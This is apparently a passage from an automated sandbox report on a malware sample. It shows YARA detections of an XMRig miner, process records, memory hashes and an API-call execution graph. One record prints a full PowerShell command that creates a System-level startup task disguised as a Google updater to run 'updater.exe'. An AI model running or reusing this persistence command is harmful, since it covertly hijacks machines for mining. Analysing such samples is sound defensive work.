                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708491367.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000002.4572426073.0000000001950000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2707785171.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708950297.0000000001963000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000002.4558997865.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708399343.0000000001979000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003F.00000003.2708993303.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:64
                                                                                                                                                            Start time:15:35:57
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:65
                                                                                                                                                            Start time:15:35:58
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Reset < >
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2151497296.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_1e90000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 967df1ec9b8ef0071b448b2b6ef0df16bcd0534d666c21387660197e8314843b
                                                                                                                                                              • Instruction ID: a1d2dc5597c6e8c9e157f201e8e778b51c020eca6ba3518d13a1daf8bf79a83c
                                                                                                                                                              • Opcode Fuzzy Hash: 967df1ec9b8ef0071b448b2b6ef0df16bcd0534d666c21387660197e8314843b
                                                                                                                                                              • Instruction Fuzzy Hash: 8F613134A0134ACFCB15DFB8E590A9EB7B2FF89305F5049A8D410AB364DB39AD45CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2151497296.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_1e90000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ac96d7dedda36617df0d05b6c0aa2b6232c892e1503bd8c8e161153788b6a40d
                                                                                                                                                              • Instruction ID: 6d21e38da7404cd6adef0793782be441027133d5f9f7c470f85749394029d013
                                                                                                                                                              • Opcode Fuzzy Hash: ac96d7dedda36617df0d05b6c0aa2b6232c892e1503bd8c8e161153788b6a40d
                                                                                                                                                              • Instruction Fuzzy Hash: 9B71C3347002419FDB29EF38D458A1DBBE6FF84318B958469E906CB395DB74EC41CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2151497296.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_1e90000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d97689c05cfef951b64109b6b7dd4d5bd9b932a37d16855bbaa2a864de7253bc
                                                                                                                                                              • Instruction ID: 63ee5427419d527f89af932df04c30901005305751e933424947beb27f2f4f11
                                                                                                                                                              • Opcode Fuzzy Hash: d97689c05cfef951b64109b6b7dd4d5bd9b932a37d16855bbaa2a864de7253bc
                                                                                                                                                              • Instruction Fuzzy Hash: A6612E34A0134ACFCB15DF78E590A9EB7B2FF89305F604968D410AB364DB39AD45CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2151497296.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E90000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_1e90000_file.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b87d0741991274c46535d58b34c25e83e107dd7e0ba9dbe0d93d2527de01052a
                                                                                                                                                              • Instruction ID: 66a1eda1cf5b3e80e2294e4b626754948336d5f64e10dd900585f74bcabb83ae
                                                                                                                                                              • Opcode Fuzzy Hash: b87d0741991274c46535d58b34c25e83e107dd7e0ba9dbe0d93d2527de01052a
                                                                                                                                                              • Instruction Fuzzy Hash: 9731F23060029A8BCF11DBAED8405AEBBF9EF85318B548179E9589B252DA30ED05C7D1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:12.4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:16%
                                                                                                                                                              Total number of Nodes:1335
                                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                                              execution_graph 3503 404f43 GetDlgItem GetDlgItem 3504 404f95 7 API calls 3503->3504 3512 4051ba 3503->3512 3505 40503c DeleteObject 3504->3505 3506 40502f SendMessageW 3504->3506 3507 405045 3505->3507 3506->3505 3508 40507c 3507->3508 3513 406594 21 API calls 3507->3513 3555 4044d6 3508->3555 3509 40529c 3511 405348 3509->3511 3516 4051ad 3509->3516 3522 4052f5 SendMessageW 3509->3522 3517 405352 SendMessageW 3511->3517 3518 40535a 3511->3518 3512->3509 3537 405229 3512->3537 3560 404e91 SendMessageW 3512->3560 3514 40505e SendMessageW SendMessageW 3513->3514 3514->3507 3515 405090 3521 4044d6 22 API calls 3515->3521 3577 40453d 3516->3577 3517->3518 3525 405373 3518->3525 3526 40536c ImageList_Destroy 3518->3526 3533 405383 3518->3533 3538 4050a1 3521->3538 3522->3516 3528 40530a SendMessageW 3522->3528 3523 40528e SendMessageW 3523->3509 3529 40537c GlobalFree 3525->3529 3525->3533 3526->3525 3527 4054fd 3527->3516 3534 40550f ShowWindow GetDlgItem ShowWindow 3527->3534 3531 40531d 3528->3531 3529->3533 3530 40517c GetWindowLongW SetWindowLongW 3532 405195 3530->3532 3542 40532e SendMessageW 3531->3542 3535 4051b2 3532->3535 3536 40519a ShowWindow 3532->3536 3533->3527 3550 4053be 3533->3550 3565 404f11 3533->3565 3534->3516 3559 40450b SendMessageW 3535->3559 3558 40450b SendMessageW 3536->3558 3537->3509 3537->3523 3538->3530 3541 4050f4 SendMessageW 3538->3541 3543 405177 3538->3543 3544 405132 SendMessageW 3538->3544 3545 405146 SendMessageW 3538->3545 3541->3538 3542->3511 3543->3530 3543->3532 3544->3538 3545->3538 3547 4054c8 3548 4054d3 InvalidateRect 3547->3548 3552 4054df 3547->3552 3548->3552 3549 4053ec SendMessageW 3551 405402 3549->3551 3550->3549 3550->3551 3551->3547 3553 405476 SendMessageW SendMessageW 3551->3553 3552->3527 3574 404e4c 3552->3574 3553->3551 3556 406594 21 API calls 3555->3556 3557 4044e1 SetDlgItemTextW 3556->3557 3557->3515 3558->3516 3559->3512 3561 404ef0 SendMessageW 3560->3561 3562 404eb4 GetMessagePos ScreenToClient SendMessageW 3560->3562 3563 404ee8 3561->3563 3562->3563 3564 404eed 3562->3564 3563->3537 3564->3561 3591 406557 lstrcpynW 3565->3591 3567 404f24 3592 40649e wsprintfW 3567->3592 3569 404f2e 3570 40140b 2 API calls 3569->3570 3571 404f37 3570->3571 3593 406557 lstrcpynW 3571->3593 3573 404f3e 3573->3550 3594 404d83 3574->3594 3576 404e61 3576->3527 3578 404555 GetWindowLongW 3577->3578 3588 404600 3577->3588 3579 40456a 3578->3579 3578->3588 3580 404597 GetSysColor 3579->3580 3581 40459a 3579->3581 3579->3588 3580->3581 3582 4045a0 SetTextColor 3581->3582 3583 4045aa SetBkMode 3581->3583 3582->3583 3584 4045c2 GetSysColor 3583->3584 3585 4045c8 3583->3585 3584->3585 3586 4045d9 3585->3586 3587 4045cf SetBkColor 3585->3587 3586->3588 3589 4045f3 CreateBrushIndirect 3586->3589 3590 4045ec DeleteObject 3586->3590 3587->3586 3589->3588 3590->3589 3591->3567 3592->3569 3593->3573 3595 404d9c 3594->3595 3596 406594 21 API calls 3595->3596 3597 404e00 3596->3597 3598 406594 21 API calls 3597->3598 3599 404e0b 3598->3599 3600 406594 21 API calls 3599->3600 3601 404e21 lstrlenW wsprintfW SetDlgItemTextW 3600->3601 3601->3576 3602 402643 3603 402672 3602->3603 3604 402657 3602->3604 3606 4026a2 3603->3606 3607 402677 3603->3607 3619 402d89 3604->3619 3609 402dab 21 API calls 3606->3609 3608 402dab 21 API calls 3607->3608 3610 40267e 3608->3610 3611 4026a9 lstrlenW 3609->3611 3622 406579 WideCharToMultiByte 3610->3622 3616 40265e 3611->3616 3613 402692 lstrlenA 3613->3616 3614 4026d6 3615 4026ec 3614->3615 3617 4060f9 WriteFile 3614->3617 3616->3614 3616->3615 3623 406128 SetFilePointer 3616->3623 3617->3615 3620 406594 21 API calls 3619->3620 3621 402d9e 3620->3621 3621->3616 3622->3613 3624 406144 3623->3624 3627 40615c 3623->3627 3625 4060ca ReadFile 3624->3625 3626 406150 3625->3626 3626->3627 3628 406165 SetFilePointer 3626->3628 3629 40618d SetFilePointer 3626->3629 3627->3614 3628->3629 3630 406170 3628->3630 3629->3627 3631 4060f9 WriteFile 3630->3631 3631->3627 3454 4015c6 3455 402dab 21 API calls 3454->3455 3456 4015cd 3455->3456 3457 405ed1 4 API calls 3456->3457 3462 4015d6 3457->3462 3458 401636 3460 401668 3458->3460 3461 40163b 3458->3461 3459 405e53 CharNextW 3459->3462 3464 401423 28 API calls 3460->3464 3474 401423 3461->3474 3462->3458 3462->3459 3467 405b05 2 API calls 3462->3467 3468 405b22 5 API calls 3462->3468 3471 4015ff 3462->3471 3472 40161c GetFileAttributesW 3462->3472 3470 401660 3464->3470 3467->3462 3468->3462 3469 40164f SetCurrentDirectoryW 3469->3470 3471->3462 3473 405aab 2 API calls 3471->3473 3472->3462 3473->3471 3475 4055dc 28 API calls 3474->3475 3476 401431 3475->3476 3477 406557 lstrcpynW 3476->3477 3477->3469 3632 404646 lstrlenW 3633 404665 3632->3633 3634 404667 WideCharToMultiByte 3632->3634 3633->3634 3641 4049c7 3642 4049f3 3641->3642 3643 404a04 3641->3643 3702 405b9b GetDlgItemTextW 3642->3702 3645 404a10 GetDlgItem 3643->3645 3647 404a6f 3643->3647 3646 404a24 3645->3646 3651 404a38 SetWindowTextW 3646->3651 3654 405ed1 4 API calls 3646->3654 3648 404b53 3647->3648 3656 406594 21 API calls 3647->3656 3700 404d02 3647->3700 3648->3700 3704 405b9b GetDlgItemTextW 3648->3704 3649 4049fe 3650 406805 5 API calls 3649->3650 3650->3643 3655 4044d6 22 API calls 3651->3655 3653 40453d 8 API calls 3658 404d16 3653->3658 3659 404a2e 3654->3659 3660 404a54 3655->3660 3661 404ae3 SHBrowseForFolderW 3656->3661 3657 404b83 3662 405f2e 18 API calls 3657->3662 3659->3651 3666 405e26 3 API calls 3659->3666 3663 4044d6 22 API calls 3660->3663 3661->3648 3664 404afb CoTaskMemFree 3661->3664 3665 404b89 3662->3665 3667 404a62 3663->3667 3668 405e26 3 API calls 3664->3668 3705 406557 lstrcpynW 3665->3705 3666->3651 3703 40450b SendMessageW 3667->3703 3675 404b08 3668->3675 3671 404a68 3674 40694b 5 API calls 3671->3674 3672 404b3f SetDlgItemTextW 3672->3648 3673 404ba0 3676 40694b 5 API calls 3673->3676 3674->3647 3675->3672 3677 406594 21 API calls 3675->3677 3683 404ba7 3676->3683 3678 404b27 lstrcmpiW 3677->3678 3678->3672 3680 404b38 lstrcatW 3678->3680 3679 404be8 3706 406557 lstrcpynW 3679->3706 3680->3672 3682 404bef 3684 405ed1 4 API calls 3682->3684 3683->3679 3688 405e72 2 API calls 3683->3688 3689 404c40 3683->3689 3685 404bf5 GetDiskFreeSpaceW 3684->3685 3687 404c19 MulDiv 3685->3687 3685->3689 3687->3689 3688->3683 3690 404cb1 3689->3690 3692 404e4c 24 API calls 3689->3692 3691 404cd4 3690->3691 3693 40140b 2 API calls 3690->3693 3707 4044f8 EnableWindow 3691->3707 3694 404c9e 3692->3694 3693->3691 3696 404cb3 SetDlgItemTextW 3694->3696 3697 404ca3 3694->3697 3696->3690 3698 404d83 24 API calls 3697->3698 3698->3690 3699 404cf0 3699->3700 3708 404920 3699->3708 3700->3653 3702->3649 3703->3671 3704->3657 3705->3673 3706->3682 3707->3699 3709 404933 SendMessageW 3708->3709 3710 40492e 3708->3710 3709->3700 3710->3709 3711 401c48 3712 402d89 21 API calls 3711->3712 3713 401c4f 3712->3713 3714 402d89 21 API calls 3713->3714 3715 401c5c 3714->3715 3716 401c71 3715->3716 3717 402dab 21 API calls 3715->3717 3718 402dab 21 API calls 3716->3718 3722 401c81 3716->3722 3717->3716 3718->3722 3719 401cd8 3721 402dab 21 API calls 3719->3721 3720 401c8c 3723 402d89 21 API calls 3720->3723 3724 401cdd 3721->3724 3722->3719 3722->3720 3725 401c91 3723->3725 3726 402dab 21 API calls 3724->3726 3727 402d89 21 API calls 3725->3727 3729 401ce6 FindWindowExW 3726->3729 3728 401c9d 3727->3728 3730 401cc8 SendMessageW 3728->3730 3731 401caa SendMessageTimeoutW 3728->3731 3732 401d08 3729->3732 3730->3732 3731->3732 3733 4028c9 3734 4028cf 3733->3734 3735 4028d7 FindClose 3734->3735 3736 402c2f 3734->3736 3735->3736 3740 405550 3741 405560 3740->3741 3742 405574 3740->3742 3744 405566 3741->3744 3745 4055bd 3741->3745 3743 40557c IsWindowVisible 3742->3743 3751 405593 3742->3751 3743->3745 3747 405589 3743->3747 3746 404522 SendMessageW 3744->3746 3748 4055c2 CallWindowProcW 3745->3748 3749 405570 3746->3749 3750 404e91 5 API calls 3747->3750 3748->3749 3750->3751 3751->3748 3752 404f11 4 API calls 3751->3752 3752->3745 3753 4016d1 3754 402dab 21 API calls 3753->3754 3755 4016d7 GetFullPathNameW 3754->3755 3756 4016f1 3755->3756 3757 401713 3755->3757 3756->3757 3760 4068b4 2 API calls 3756->3760 3758 401728 GetShortPathNameW 3757->3758 3759 402c2f 3757->3759 3758->3759 3761 401703 3760->3761 3761->3757 3763 406557 lstrcpynW 3761->3763 3763->3757 3764 401e53 GetDC 3765 402d89 21 API calls 3764->3765 3766 401e65 GetDeviceCaps MulDiv ReleaseDC 3765->3766 3767 402d89 21 API calls 3766->3767 3768 401e96 3767->3768 3769 406594 21 API calls 3768->3769 3770 401ed3 CreateFontIndirectW 3769->3770 3771 40263d 3770->3771 3772 402955 3773 402dab 21 API calls 3772->3773 3774 402961 3773->3774 3775 402977 3774->3775 3776 402dab 21 API calls 3774->3776 3777 406022 2 API calls 3775->3777 3776->3775 3778 40297d 3777->3778 3800 406047 GetFileAttributesW CreateFileW 3778->3800 3780 40298a 3781 402a40 3780->3781 3784 4029a5 GlobalAlloc 3780->3784 3785 402a28 3780->3785 3782 402a47 DeleteFileW 3781->3782 3783 402a5a 3781->3783 3782->3783 3784->3785 3786 4029be 3784->3786 3787 4032b9 35 API calls 3785->3787 3801 4034ea SetFilePointer 3786->3801 3789 402a35 CloseHandle 3787->3789 3789->3781 3790 4029c4 3791 4034d4 ReadFile 3790->3791 3792 4029cd GlobalAlloc 3791->3792 3793 402a11 3792->3793 3794 4029dd 3792->3794 3796 4060f9 WriteFile 3793->3796 3795 4032b9 35 API calls 3794->3795 3798 4029ea 3795->3798 3797 402a1d GlobalFree 3796->3797 3797->3785 3799 402a08 GlobalFree 3798->3799 3799->3793 3800->3780 3801->3790 3802 403fd7 3803 404150 3802->3803 3804 403fef 3802->3804 3806 404161 GetDlgItem GetDlgItem 3803->3806 3822 4041a1 3803->3822 3804->3803 3805 403ffb 3804->3805 3807 404006 SetWindowPos 3805->3807 3808 404019 3805->3808 3809 4044d6 22 API calls 3806->3809 3807->3808 3813 404022 ShowWindow 3808->3813 3814 404064 3808->3814 3810 40418b SetClassLongW 3809->3810 3815 40140b 2 API calls 3810->3815 3811 4041fb 3812 404522 SendMessageW 3811->3812 3819 40414b 3811->3819 3841 40420d 3812->3841 3820 404042 GetWindowLongW 3813->3820 3821 40410e 3813->3821 3816 404083 3814->3816 3817 40406c DestroyWindow 3814->3817 3815->3822 3824 404088 SetWindowLongW 3816->3824 3825 404099 3816->3825 3823 40445f 3817->3823 3818 401389 2 API calls 3826 4041d3 3818->3826 3820->3821 3828 40405b ShowWindow 3820->3828 3827 40453d 8 API calls 3821->3827 3822->3811 3822->3818 3823->3819 3833 404490 ShowWindow 3823->3833 3824->3819 3825->3821 3830 4040a5 GetDlgItem 3825->3830 3826->3811 3831 4041d7 SendMessageW 3826->3831 3827->3819 3828->3814 3829 404461 DestroyWindow EndDialog 3829->3823 3834 4040d3 3830->3834 3835 4040b6 SendMessageW IsWindowEnabled 3830->3835 3831->3819 3832 40140b 2 API calls 3832->3841 3833->3819 3837 4040e0 3834->3837 3839 404127 SendMessageW 3834->3839 3840 4040f3 3834->3840 3847 4040d8 3834->3847 3835->3819 3835->3834 3836 406594 21 API calls 3836->3841 3837->3839 3837->3847 3839->3821 3842 404110 3840->3842 3843 4040fb 3840->3843 3841->3819 3841->3829 3841->3832 3841->3836 3844 4044d6 22 API calls 3841->3844 3848 4044d6 22 API calls 3841->3848 3864 4043a1 DestroyWindow 3841->3864 3845 40140b 2 API calls 3842->3845 3846 40140b 2 API calls 3843->3846 3844->3841 3845->3847 3846->3847 3847->3821 3873 4044af 3847->3873 3849 404288 GetDlgItem 3848->3849 3850 4042a5 ShowWindow EnableWindow 3849->3850 3851 40429d 3849->3851 3876 4044f8 EnableWindow 3850->3876 3851->3850 3853 4042cf EnableWindow 3858 4042e3 3853->3858 3854 4042e8 GetSystemMenu EnableMenuItem SendMessageW 3855 404318 SendMessageW 3854->3855 3854->3858 3855->3858 3857 403fb8 22 API calls 3857->3858 3858->3854 3858->3857 3877 40450b SendMessageW 3858->3877 3878 406557 lstrcpynW 3858->3878 3860 404347 lstrlenW 3861 406594 21 API calls 3860->3861 3862 40435d SetWindowTextW 3861->3862 3863 401389 2 API calls 3862->3863 3863->3841 3864->3823 3865 4043bb CreateDialogParamW 3864->3865 3865->3823 3866 4043ee 3865->3866 3867 4044d6 22 API calls 3866->3867 3868 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3867->3868 3869 401389 2 API calls 3868->3869 3870 40443f 3869->3870 3870->3819 3871 404447 ShowWindow 3870->3871 3872 404522 SendMessageW 3871->3872 3872->3823 3874 4044b6 3873->3874 3875 4044bc SendMessageW 3873->3875 3874->3875 3875->3821 3876->3853 3877->3858 3878->3860 3879 4014d7 3880 402d89 21 API calls 3879->3880 3881 4014dd Sleep 3880->3881 3883 402c2f 3881->3883 3884 40195b 3885 402dab 21 API calls 3884->3885 3886 401962 lstrlenW 3885->3886 3887 40263d 3886->3887 3888 4020dd 3889 4021a1 3888->3889 3890 4020ef 3888->3890 3892 401423 28 API calls 3889->3892 3891 402dab 21 API calls 3890->3891 3893 4020f6 3891->3893 3899 4022fb 3892->3899 3894 402dab 21 API calls 3893->3894 3895 4020ff 3894->3895 3896 402115 LoadLibraryExW 3895->3896 3897 402107 GetModuleHandleW 3895->3897 3896->3889 3898 402126 3896->3898 3897->3896 3897->3898 3908 4069ba 3898->3908 3902 402170 3904 4055dc 28 API calls 3902->3904 3903 402137 3905 401423 28 API calls 3903->3905 3906 402147 3903->3906 3904->3906 3905->3906 3906->3899 3907 402193 FreeLibrary 3906->3907 3907->3899 3913 406579 WideCharToMultiByte 3908->3913 3910 4069d7 3911 402131 3910->3911 3912 4069de GetProcAddress 3910->3912 3911->3902 3911->3903 3912->3911 3913->3910 3914 402b5e 3915 402bb0 3914->3915 3916 402b65 3914->3916 3917 40694b 5 API calls 3915->3917 3919 402d89 21 API calls 3916->3919 3922 402bae 3916->3922 3918 402bb7 3917->3918 3920 402dab 21 API calls 3918->3920 3921 402b73 3919->3921 3923 402bc0 3920->3923 3924 402d89 21 API calls 3921->3924 3923->3922 3925 402bc4 IIDFromString 3923->3925 3928 402b7f 3924->3928 3925->3922 3926 402bd3 3925->3926 3926->3922 3932 406557 lstrcpynW 3926->3932 3931 40649e wsprintfW 3928->3931 3929 402bf0 CoTaskMemFree 3929->3922 3931->3922 3932->3929 3933 401761 3934 402dab 21 API calls 3933->3934 3935 401768 3934->3935 3936 406076 2 API calls 3935->3936 3937 40176f 3936->3937 3937->3937 3938 401d62 3939 402d89 21 API calls 3938->3939 3940 401d73 SetWindowLongW 3939->3940 3941 402c2f 3940->3941 3942 4028e3 3943 4028eb 3942->3943 3944 4028ef FindNextFileW 3943->3944 3947 402901 3943->3947 3945 402948 3944->3945 3944->3947 3948 406557 lstrcpynW 3945->3948 3948->3947 3949 403be7 3950 403bf2 3949->3950 3951 403bf9 GlobalAlloc 3950->3951 3952 403bf6 3950->3952 3951->3952 3953 401568 3954 402ba9 3953->3954 3957 40649e wsprintfW 3954->3957 3956 402bae 3957->3956 3958 40196d 3959 402d89 21 API calls 3958->3959 3960 401974 3959->3960 3961 402d89 21 API calls 3960->3961 3962 401981 3961->3962 3963 402dab 21 API calls 3962->3963 3964 401998 lstrlenW 3963->3964 3966 4019a9 3964->3966 3965 4019ea 3966->3965 3970 406557 lstrcpynW 3966->3970 3968 4019da 3968->3965 3969 4019df lstrlenW 3968->3969 3969->3965 3970->3968 3971 40166f 3972 402dab 21 API calls 3971->3972 3973 401675 3972->3973 3974 4068b4 2 API calls 3973->3974 3975 40167b 3974->3975 3976 402af0 3977 402d89 21 API calls 3976->3977 3978 402af6 3977->3978 3979 406594 21 API calls 3978->3979 3980 402933 3978->3980 3979->3980 3981 4026f1 3982 402d89 21 API calls 3981->3982 3989 402700 3982->3989 3983 40283d 3984 40274a ReadFile 3984->3983 3984->3989 3985 4060ca ReadFile 3985->3989 3986 40278a MultiByteToWideChar 3986->3989 3987 40283f 3994 40649e wsprintfW 3987->3994 3988 406128 5 API calls 3988->3989 3989->3983 3989->3984 3989->3985 3989->3986 3989->3987 3989->3988 3991 4027b0 SetFilePointer MultiByteToWideChar 3989->3991 3993 402850 3989->3993 3991->3989 3992 402871 SetFilePointer 3992->3983 3993->3983 3993->3992 3994->3983 3406 401774 3445 402dab 3406->3445 3408 40177b 3409 4017a3 3408->3409 3410 40179b 3408->3410 3453 406557 lstrcpynW 3409->3453 3452 406557 lstrcpynW 3410->3452 3413 4017a1 3417 406805 5 API calls 3413->3417 3414 4017ae 3415 405e26 3 API calls 3414->3415 3416 4017b4 lstrcatW 3415->3416 3416->3413 3428 4017c0 3417->3428 3418 4017c6 3419 4068b4 2 API calls 3418->3419 3422 4017d2 CompareFileTime 3418->3422 3418->3428 3419->3418 3420 406022 2 API calls 3420->3428 3422->3418 3423 401892 3424 4055dc 28 API calls 3423->3424 3426 40189c 3424->3426 3425 4055dc 28 API calls 3427 40187e 3425->3427 3429 4032b9 35 API calls 3426->3429 3428->3418 3428->3420 3428->3423 3432 406594 21 API calls 3428->3432 3437 406557 lstrcpynW 3428->3437 3442 405bb7 MessageBoxIndirectW 3428->3442 3443 401869 3428->3443 3451 406047 GetFileAttributesW CreateFileW 3428->3451 3430 4018af 3429->3430 3431 4018c3 SetFileTime 3430->3431 3433 4018d5 FindCloseChangeNotification 3430->3433 3431->3433 3432->3428 3433->3427 3434 4018e6 3433->3434 3435 4018eb 3434->3435 3436 4018fe 3434->3436 3438 406594 21 API calls 3435->3438 3439 406594 21 API calls 3436->3439 3437->3428 3440 4018f3 lstrcatW 3438->3440 3441 401906 3439->3441 3440->3441 3444 405bb7 MessageBoxIndirectW 3441->3444 3442->3428 3443->3425 3443->3427 3444->3427 3446 402db7 3445->3446 3447 406594 21 API calls 3446->3447 3448 402dd8 3447->3448 3449 402de4 3448->3449 3450 406805 5 API calls 3448->3450 3449->3408 3450->3449 3451->3428 3452->3413 3453->3414 3995 4014f5 SetForegroundWindow 3996 402c2f 3995->3996 3997 401a77 3998 402d89 21 API calls 3997->3998 3999 401a80 3998->3999 4000 402d89 21 API calls 3999->4000 4001 401a25 4000->4001 4002 401578 4003 401591 4002->4003 4004 401588 ShowWindow 4002->4004 4005 402c2f 4003->4005 4006 40159f ShowWindow 4003->4006 4004->4003 4006->4005 4007 4023f9 4008 402dab 21 API calls 4007->4008 4009 402408 4008->4009 4010 402dab 21 API calls 4009->4010 4011 402411 4010->4011 4012 402dab 21 API calls 4011->4012 4013 40241b GetPrivateProfileStringW 4012->4013 4014 401ffb 4015 402dab 21 API calls 4014->4015 4016 402002 4015->4016 4017 4068b4 2 API calls 4016->4017 4018 402008 4017->4018 4020 402019 4018->4020 4021 40649e wsprintfW 4018->4021 4021->4020 4022 401b7c 4023 402dab 21 API calls 4022->4023 4024 401b83 4023->4024 4025 402d89 21 API calls 4024->4025 4026 401b8c wsprintfW 4025->4026 4027 402c2f 4026->4027 4028 401000 4029 401037 BeginPaint GetClientRect 4028->4029 4030 40100c DefWindowProcW 4028->4030 4032 4010f3 4029->4032 4035 401179 4030->4035 4033 401073 CreateBrushIndirect FillRect DeleteObject 4032->4033 4034 4010fc 4032->4034 4033->4032 4036 401102 CreateFontIndirectW 4034->4036 4037 401167 EndPaint 4034->4037 4036->4037 4038 401112 6 API calls 4036->4038 4037->4035 4038->4037 4039 404980 4040 404990 4039->4040 4041 4049b6 4039->4041 4042 4044d6 22 API calls 4040->4042 4043 40453d 8 API calls 4041->4043 4044 40499d SetDlgItemTextW 4042->4044 4045 4049c2 4043->4045 4044->4041 4046 401680 4047 402dab 21 API calls 4046->4047 4048 401687 4047->4048 4049 402dab 21 API calls 4048->4049 4050 401690 4049->4050 4051 402dab 21 API calls 4050->4051 4052 401699 MoveFileW 4051->4052 4053 4016ac 4052->4053 4059 4016a5 4052->4059 4054 4068b4 2 API calls 4053->4054 4057 4022fb 4053->4057 4056 4016bb 4054->4056 4055 401423 28 API calls 4055->4057 4056->4057 4058 406317 40 API calls 4056->4058 4058->4059 4059->4055 4060 401503 4061 401508 4060->4061 4063 401520 4060->4063 4062 402d89 21 API calls 4061->4062 4062->4063 4064 401a04 4065 402dab 21 API calls 4064->4065 4066 401a0b 4065->4066 4067 402dab 21 API calls 4066->4067 4068 401a14 4067->4068 4069 401a1b lstrcmpiW 4068->4069 4070 401a2d lstrcmpW 4068->4070 4071 401a21 4069->4071 4070->4071 4072 402304 4073 402dab 21 API calls 4072->4073 4074 40230a 4073->4074 4075 402dab 21 API calls 4074->4075 4076 402313 4075->4076 4077 402dab 21 API calls 4076->4077 4078 40231c 4077->4078 4079 4068b4 2 